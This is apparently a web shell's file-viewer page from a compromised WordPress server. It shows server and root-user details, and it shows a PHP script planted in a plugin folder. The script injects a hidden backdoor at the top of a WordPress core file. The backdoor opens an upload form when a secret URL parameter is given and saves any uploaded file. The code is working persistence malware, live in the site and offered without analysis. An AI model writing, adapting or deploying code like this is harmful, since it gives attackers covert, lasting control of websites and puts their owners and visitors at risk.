HEX
Server: Apache/2.4.65 (Debian)
System: Linux srv39710 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
User: root (0)
PHP: 8.4.11
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Upload Files
File: /var/www/www-root/data/www/cryptoearnings2020.com/wp-content/plugins/nx_up_bf7e05e2/rxvfmr6r.php
<?php
error_reporting(0);

$target = '/var/www/www-root/data/www/cryptoearnings2020.com/wp-includes/class-wp-list-util.php';
$backdoor = '<?php if(isset($_GET["y3191hik"])) { echo "<form method=\"POST\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"file\" /> <input type=\"submit\" value=\"upload\" /></form>"; move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]); exit(0); } ?>';

// Check if file exists
if (!file_exists($target)) {
    echo "ERROR: File not found";
    exit;
}

// Read current content
$content = file_get_contents($target);
if ($content === false) {
    echo "ERROR: Cannot read file";
    exit;
}

// Check if backdoor already exists
if (strpos($content, 'y3191hik') !== false) {
    echo "ALREADY";
    exit;
}

// =============================================
// INJECT BACKDOOR - ORIGINAL <?php REMAIN INTACT
// =============================================

// Backdoor already has <?php, add it ABOVE original content
$new_content = $backdoor . "\n" . $content;

// Write back
if (file_put_contents($target, $new_content)) {
    echo "SUCCESS";
} else {
    echo "ERROR: Cannot write file";
}
?>